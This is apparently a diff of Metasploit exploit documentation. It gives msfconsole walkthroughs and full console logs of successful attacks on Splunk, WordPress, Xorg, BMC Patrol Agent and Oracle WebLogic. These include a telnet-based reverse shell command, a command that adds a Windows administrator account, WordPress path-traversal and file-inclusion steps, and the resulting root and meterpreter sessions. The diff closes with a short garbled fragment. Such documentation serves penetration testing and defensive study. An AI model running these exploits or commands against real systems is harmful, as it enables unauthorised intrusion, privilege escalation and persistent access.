+[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100
+  ```
+
+### Tested against splunk-5.0.1-143156 on Ubuntu 10.04
+
+```
+msf > use exploit/multi/http/splunk_upload_app_exec 
+msf  exploit(splunk_upload_app_exec) > show options
+
+Module options (exploit/multi/http/splunk_upload_app_exec):
+
+   Name             Current Setting                                                                         Required  Description
+   ----             ---------------                                                                         --------  -----------
+   PASSWORD         changeme                                                                                yes       The password for the specified username
+   Proxies                                                                                                  no        Use a proxy chain
+   RHOST                                                                                                    yes       The target address
+   RPORT            8000                                                                                    yes       The target port
+   SPLUNK_APP_FILE  /Users/juan/Projects/git/metasploit-framework/data/exploits/splunk/upload_app_exec.tgz  yes       The "rogue" Splunk application tgz
+   USERNAME         admin                                                                                   yes       The username with admin role to authenticate as
+   VHOST                                                                                                    no        HTTP server virtual host
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Splunk 5.0.1 / Linux
+
+
+msf  exploit(splunk_upload_app_exec) > set RHOST 192.168.1.137
+RHOST => 192.168.1.137
+msf  exploit(splunk_upload_app_exec) > rexploit
+[*] Reloading module...
+
+[*] Using command: sh -c '(sleep 4597|telnet 192.168.1.129 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.129 4444 >/dev/null 2>&1 &)'
+[*] Authenticating...
+[*] Started reverse double handler
+[*] Fetching csrf token from /en-US/manager/launcher/apps/local
+[*] Uploading file upload_app_exec.tgz
+[*] upload_app_exec successfully uploaded
+[*] Fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
+[*] Invoking script command
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo uyYJGuNfu2AetK0N;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "uyYJGuNfu2AetK0N\r\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 1 opened (192.168.1.129:4444 -> 192.168.1.137:41432) at 2012-12-07 11:53:35 +0100
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+### Tested against splunk-5.0.1-143156 on Windows XP
+
+```
+msf  exploit(splunk_upload_app_exec) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Splunk 5.0.1 / Linux
+   1   Splunk 5.0.1 / Windows
+
+
+msf  exploit(splunk_upload_app_exec) > set target 1
+target => 1
+msf  exploit(splunk_upload_app_exec) > set payload cmd/windows/adduser 
+payload => cmd/windows/adduser
+msf  exploit(splunk_upload_app_exec) > show options
+
+Module options (exploit/multi/http/splunk_upload_app_exec):
+
+   Name             Current Setting                                                                         Required  Description
+   ----             ---------------                                                                         --------  -----------
+   PASSWORD         changeme                                                                                yes       The password for the specified username
+   Proxies                                                                                                  no        Use a proxy chain
+   RHOST            192.168.1.137                                                                           yes       The target address
+   RPORT            8000                                                                                    yes       The target port
+   SPLUNK_APP_FILE  /Users/juan/Projects/git/metasploit-framework/data/exploits/splunk/upload_app_exec.tgz  yes       The "rogue" Splunk application tgz
+   USERNAME         admin                                                                                   yes       The username with admin role to authenticate as
+   VHOST                                                                                                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/adduser):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   CUSTOM                   no        Custom group name to be used instead of default
+   PASS    Metasploit$1     yes       The password for this user
+   USER    metasploit       yes       The username to create
+   WMIC    false            yes       Use WMIC on the target to resolve administrators group
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Splunk 5.0.1 / Windows
+
+
+msf  exploit(splunk_upload_app_exec) > rexploit
+[*] Reloading module...
+
+[*] Using command: cmd.exe /c net user metasploit Metasploit$1 /ADD && net localgroup Administrators metasploit /ADD
+[*] Authenticating...
+[*] Fetching csrf token from /en-US/manager/launcher/apps/local
+[*] Uploading file upload_app_exec.tgz
+[*] upload_app_exec successfully uploaded
+[*] Fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
+[*] Invoking script command
+```
+
+After that, on the victim machine:
+
+```
+C:\Documents and Settings\Administrator>net user metasploit
+User name                    metasploit
+Full Name
+Comment
+User's comment
+Country code                 000 (System Default)
+Account active               Yes
+Account expires              Never
+
+Password last set            12/6/2012 11:19 PM
+Password expires             1/18/2013 10:07 PM
+Password changeable          12/6/2012 11:19 PM
+Password required            Yes
+User may change password     Yes
+
+Workstations allowed         All
+Logon script
+User profile
+Home directory
+Last logon                   Never
+
+Logon hours allowed          All
+
+Local Group Memberships      *Administrators       *Users
+Global Group memberships     *None
+The command completed successfully.
+
+
+C:\Documents and Settings\Administrator>
+```
@@ -0,0 +1,58 @@
+On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion.
+An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.
+
+## Exploitation Steps
+
+1. Upload an image containing PHP code
+2. Edit the `_wp_attached_file` entry from `meta_input` $_POST array to specify an arbitrary path
+3. Perform the Path Traversal by using the `crop-image` Wordpress function
+4. Perform the Local File Inclusion by creating a new WordPress post and set `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.
+
+When visiting the post created by the attacker it is possible to obtain code execudion.
+
+More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/).
+
+## Verification Steps
+
+Confirm that functionality works:
+1. Start `msfconsole`
+2. `use exploit/multi/http/wp_crop_rce`
+3. Set the `RHOST`
+4. Set `USERNAME` and `PASSWORD`
+4. Set `LHOST` and `LPORT`
+5. Run the exploit: `run`
+6. Confirm you have now a meterpreter session
+
+
+## Scenarios
+
+### Ubuntu 18.04 running WordPress 4.9.8
+
+```
+msf5 > use exploit/multi/http/wp_crop_rce
+msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(multi/http/wp_crop_rce) > set username author
+username => author
+msf5 exploit(multi/http/wp_crop_rce) > set password author
+password => author
+msf5 exploit(multi/http/wp_crop_rce) > run
+
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Authenticating with WordPress using author:author...
+[+] Authenticated with WordPress
+[*] Preparing payload...
+[*] Checking crop library
+[*] Uploading payload
+[+] Image uploaded
+[*] Uploading payload
+[+] Image uploaded
+[*] Including into theme
+[*] Sending stage (38247 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400
+
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
+Meterpreter : php/linux
+```
@@ -1,40 +1,37 @@
 ## Description

-  This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.  A permission check flaw exists for -modulepath and -logfile options when starting Xorg.  This flaw allows users to write over existing files on the system.  This exploit backs up crontab and then uses -logfile to overwrite it.  A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.        
+  This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.  A permission check flaw exists for -modulepath and -logfile options when starting Xorg.  This flaw allows users to write over existing files on the system.  This exploit backs up crontab and then uses -logfile to overwrite it.  A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.


 ## Vulnerable Application

-  Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.  
+  Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.

-  Xorg is more restrictive to exploit under CentOS.  The user must have console lock and SeLinux may interfere.  If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.  
+  Xorg is more restrictive to exploit under CentOS / RHEL.  The user must have console lock and SeLinux may interfere.  If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.

  This module has been tested successfully on:

  * OpenBSD 6.3
  * OpenBSD 6.4
+  * CentOS 7.4.1708 x86_64
  * CentOS 7.5.1084 x86_64
+  * Red Hat Enterprise Linux 7.5 x86_64


 ## Verification Steps
-  On CentOS your session must have console lock.  To get a console lock you can login locally with a user.  
+
+  On CentOS/RHEL your session must have console lock.  To get a console lock you can login locally with a user.

  1. Start `msfconsole`
  2. Get a session
  3. Do: `use exploit/multi/local/xorg_x11_suid_server`
-  4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)   
+  4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)
  5. Do: `set SESSION [SESSION]`
  6. Do: `set LHOST [LHOST]`
  7. Do: `run`
  8. You should get a new *root* session


-## Options
-
-  **SESSION**
-
-  Which session to use, which can be viewed with `sessions`
-
 ## Advanced Options

  **Xdisplay**
@@ -43,19 +40,25 @@

  **WritableDir**

-  A writable directory file system path. (default: `/tmp`)
+  A writable directory file system path (default: `/tmp`)

-
-   **ConsoleLock**
+  **ConsoleLock**
   
-  Will check for console lock under linux  (default: `true`)
+  Will check for console lock under linux (default: `true`)


 ## Scenarios

+### OpenBSD
+
 ```
+msf5 > use exploit/multi/local/xorg_x11_suid_server
 msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
 session => 1
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2
+lhost => 172.30.0.2
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
+verbose => true
 msf5 exploit(multi/local/xorg_x11_suid_server) > run

 [!] SESSION may not be compatible with this module.
@@ -89,3 +92,98 @@ msf5 exploit(multi/local/xorg_x11_suid_server) > run
 id
 uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
 ```
+
+### CentOS 7.4.1708 x86_64
+
+```
+msf5 > use exploit/multi/local/xorg_x11_suid_server
+msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
+session => 1
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
+verbose => true
+msf5 exploit(multi/local/xorg_x11_suid_server) > run
+
+[*] Started reverse double SSL handler on 172.16.191.188:4444 
+[*] Running additional check for Linux
+[+] Console lock for user
+[+] Selinux is not an issue
+[+] Xorg path found at /usr/bin/Xorg
+[+] Xorg binary /usr/bin/Xorg is SUID
+[+] Xorg version 1.19.3 is vulnerable
+[!] Xorg in process list
+[!] Could not get version or Xorg process possibly running, may fail
+[+] Passed all initial checks for exploit
+[*] Uploading your payload, this could take a while
+[*] Trying /etc/crontab overwrite
+[+] /etc/crontab overwrite successful
+[*] Waiting on cron to run
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo zk0jobDMxFdBxLBU;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "zk0jobDMxFdBxLBU\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
+[*] Waiting on cron to run
+[+] Returning session after cleaning
+[+] Deleted /tmp/.session-Tafw0iW0r8
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
+uname -a
+Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### Red Hat Enterprise Linux 7.5 x86_64
+
+```
+msf5 > use exploit/multi/local/xorg_x11_suid_server
+msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
+session => 1
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
+verbose => true
+msf5 exploit(multi/local/xorg_x11_suid_server) > run
+
+[*] Started reverse double SSL handler on 172.16.191.165:4444 
+[*] Running additional check for Linux
+[+] Console lock for user
+[+] Selinux is not an issue
+[+] Xorg path found at /usr/bin/Xorg
+[+] Xorg binary /usr/bin/Xorg is SUID
+[+] Xorg version 1.19.5 is vulnerable
+[!] Xorg in process list
+[!] Could not get version or Xorg process possibly running, may fail
+[+] Passed all initial checks for exploit
+[*] Uploading your payload, this could take a while
+[*] Trying /etc/crontab overwrite
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo EEdPp66R4es6U3WF;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[+] /etc/crontab overwrite successful. Waiting for job to run (may take a minute)...
+[*] Reading from socket B
+[*] B: "EEdPp66R4es6U3WF\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.228:44978) at 2019-04-21 06:29:04 -0400
+[+] Returning session after cleaning
+[+] Deleted /tmp/.session-aqxyug0fH
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
+uname -a
+Linux red-hat-7-5-x64.local 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
+cat /etc/redhat-release
+Red Hat Enterprise Linux Server release 7.5 (Maipo)
+```
+
@@ -0,0 +1,94 @@
+## Description
+This module exploits the lack of proper authorization checks in the BMC Patrol Agent that allows arbitrary operating system commands to be executed at a higher privilege level than the user being authenticated. The module is simply a ruby implementation of the remote protocol provided by BMC Patrol Agent to execute system commands.
+
+The vulnerability was identified by Ryan Wincey of [Securifera](https://www.securifera.com/) and was assigned [CVE-2018-20735](https://www.cvedetails.com/cve/CVE-2018-20735/) Further details can be found at the [Securifera website](https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/).
+
+
+## Vulnerable Application
+The module affects the BMC Patrol Agent component of [BMC TrueSight Infrastructure Management](https://docs.bmc.com/docs/TSInfrastructure/113/home-774795879.html). The agent is installed on servers managed using BMC TrueSight Infrastructure Management and listens on TCP port 3181. The vulnerability affects versions up to 11.3.
+
+## Verification Steps
+To use this exploit you will need access to BMC Patrol Agent.
+
+1. Install the BMC Patrol agent on a host.
+2. Ensure that the PatrolAgent service is running and listening on TCP port 3181.
+3. Launch `msfconsole`.
+4. Load the module `use exploit/multi/misc/bmc_patrol_cmd_exec`.
+5. Set the username to authenticate with `set USER patrol`.
+6. Set the password for the user `set PASSWORD password`.
+7. Set the command to execute `set CMD "whoami"`.
+8. Run the exploit `exploit`.
+
+The result should be that the string `nt authority\system` is returned and output.
+
+## Usage Scenarios
+The exploit module contains several targets as detailed below.
+
+### Target 0: Windows Powershell Injected Shellcode
+This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). 
+
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec 
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133
+	RHOSTS => 192.168.162.133
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128
+	LHOST => 192.168.162.128
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set payload windows/meterpreter/reverse_tcp
+	payload => windows/meterpreter/reverse_tcp
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user
+	USER => user
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j
+	[*] Exploit running as background job 0.
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > 
+	[*] Started reverse TCP handler on 192.168.162.128:4444 
+	[*] 192.168.162.133:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.133:3181 - Successfully authenticated user.
+	[*] Sending stage (179779 bytes) to 192.168.162.133
+	[*] Meterpreter session 1 opened (192.168.162.128:4444 -> 192.168.162.133:58461) at 2019-02-10 23:00:03 -0500
+
+
+### Target 1: Generic Cmd
+This target can be used with *cmd* payloads to execute operating system commands against the target host.
+
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec 
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.130
+	RHOSTS => 192.168.162.130
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128
+	LHOST => 192.168.162.128
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER patrol
+	USER => patrol
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set TARGET 1
+	TARGET => 1
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PAYLOAD cmd/unix/reverse_netcat
+	PAYLOAD => cmd/unix/reverse_netcat
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j
+	[*] Exploit running as background job 0.
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > 
+	[*] Started reverse TCP handler on 192.168.162.128:4444 
+	[*] 192.168.162.130:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.130:3181 - Successfully authenticated user.
+	[*] Command shell session 1 opened (192.168.162.128:4444 -> 192.168.162.130:57408) at 2019-02-10 23:05:12 -0500
+
+
+### Target Cmd Execution: Windows/Unix/Linux
+This target isn't a formal target. It was added to allow a user to execute commands entirely through the Patrol Agent remote administration feature and view the output. It would be the most quiet of the targets as it does not create any additional connections or use powershell by default like Target 0.
+	
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133
+	RHOSTS => 192.168.162.133
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user
+	USER => user
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set CMD whoami
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit
+	[*] 192.168.162.133:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.133:3181 - Successfully authenticated user.
+	[*] 192.168.162.133:3181 - Command to execute: whoami
+	[*] 192.168.162.133:3181 - Output:
+	nt authority\system
+
+
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+
+CVE-2017-10271 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.  The exploit provides an unauthenticated attacker with remote arbitrary command execution.
+
+Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments.  It is downloadable from Oracle once registered for an account.  For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`), Weblogic 10.3.6 for Windows (`wls1036_dev.zip`).  For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`) in combination with a JDK (`jdk-8u211-windows-x64.exe`).
+
+## Verification Steps
+
+#### Install the application
+  1. Install the application using the binaries above, with both a WebLogic server and an admin server.
+  2. When prompted, name the project `base_domain`.
+  3. When prompted, use a development environment instead of a production environment.
+  4. When prompted, keep the default port of TCP/7001.
+  5. When prompted, provide a username and password, and make a note of them.
+  6. Upon completion of the installer, find and execute the admin server.  On Windows: `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`.  On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
+  7. You may be prompted for the username and password you generated during the install process.
+  8. Wait for the output: `<Server state changed to RUNNING.>`
+
+#### Checking for the vulnerability
+  1. Start msfconsole
+  2. `use exploit/multi/misc/weblogic_deserialize_asyncresponseservice`
+  3. Configure RHOSTS to the target address, and set RPORT if the default port is not being used.
+  4. Run the `check` method to confirm exploitability.
+  5. Look for the following output:
+
+```
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
+[+] 172.16.135.128:8088 - The target is vulnerable.
+```
+
+#### Exploiting the vulnerability
+  1. Follow the steps in the previous "checking" section.
+  2. Set the operating system of the target (eg. `set TARGET Windows`)
+  3. Configure the payload and payload parameters.
+  4. `run`
+
+## Options
+
+  **TARGETURI** : Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`. You can also set `VHOST` instead to handle virtual hosts.
+
+## Demo
+
+```
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > exploit
+
+[*] Started reverse TCP handler on 172.16.135.1:4444 
+[*] Generating payload...
+[*] Sending payload...
+[*] Sending stage (179779 bytes) to 172.16.135.128
+[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49266) at 2019-05-22 14:16:03 -0500
+
+meterpreter >
+```
@@ -0,0 +1,38 @@
+## Description
+ Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2016-3510), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
+
+## Vulnerable Application
+ Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.0.
+
+## Verification Steps
+ 1. `./msfconsole -q`
+ 2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject`
+ 3. `set rhosts <rhost>`
+ 4. `set rport <srvport>`
+ 5. `exploit`
+
+## Scenarios
+### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
+ ```
+ msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rhost 192.168.192.6
+ rhost => 192.168.192.6
+ msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > set rport 7001
+ rport => 7001
+ msf exploit(multi/misc/weblogic_deserialize_marshalledobject) > exploit
+ 
+ [*] Started reverse TCP handler on 192.168.192.136:4444 
+ [*] 192.168.192.6:7001 - Sending handshake...
+ [*] 192.168.192.6:7001 - Sending T3 request object...
+ [*] 192.168.192.6:7001 - Sending client object payload...
+ [*] Sending stage (179779 bytes) to 192.168.192.6
+ [*] Meterpreter session 8 opened (192.168.192.136:4444 -> 192.168.192.6:49276) at 2018-12-14 11:44:30 -0800
+
+ meterpreter > sysinfo
+ Computer        : GIOTTO-HS-W7
+ OS              : Windows 7 (Build 7600).
+ Architecture    : x64
+ System Language : en_US
+ Domain          : WORKGROUP
+ Logged On Users : 2
+ Meterpreter     : x86/windows
+ ```
@@ -0,0 +1,52 @@
+## Description
+ Oracle Weblogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0 are vulnerable to a deserialization vulnerability (CVE 2015-4852), which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
+
+Note that successful exploitation will output the following warning to the admin server console:
+
+```
+<Mar 26, 2019 4:13:24 PM CDT> <Error> <RJVM> <BEA-000503> <Incoming message header or abbreviation processing failed
+ java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
+java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
+        at $Proxy57.entrySet(Unknown Source)
+        at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:327)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
+        Truncated. see log file for complete stacktrace
+```
+
+## Vulnerable Application
+ Oracle Weblogic Server v10.3.6.0, v12.1.2.0, v12.1.3.0, and v12.2.1.0.
+
+## Verification Steps
+ 1. `./msfconsole -q`
+ 2. `use exploit/multi/misc/weblogic_deserialize_rawobject`
+ 3. `set rhosts <rhost>`
+ 4. `set rport <srvport>`
+ 5. `exploit`
+
+## Scenarios
+### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
+ ```
+ msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rhost 192.168.192.6
+ rhost => 192.168.192.6
+ msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rport 7001
+ rport => 7001
+ msf exploit(multi/misc/weblogic_deserialize_rawobject) > exploit
+
+ [*] Started reverse TCP handler on 192.168.192.136:4444 
+ [*] 192.168.192.6:7001 - Sending handshake...
+ [*] 192.168.192.6:7001 - Sending T3 request object...
+ [*] 192.168.192.6:7001 - Sending client object payload...
+ [*] Sending stage (179779 bytes) to 192.168.192.6
+ [*] Meterpreter session 7 opened (192.168.192.136:4444 -> 192.168.192.6:49266) at 2018-12-14 11:40:29 -0800
+ 
+ meterpreter > sysinfo
+ Computer        : GIOTTO-HS-W7
+ OS              : Windows 7 (Build 7600).
+ Architecture    : x64
+ System Language : en_US
+ Domain          : WORKGROUP
+ Logged On Users : 2
+ Meterpreter     : x86/windows
+ ```
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .5.3
 .6.2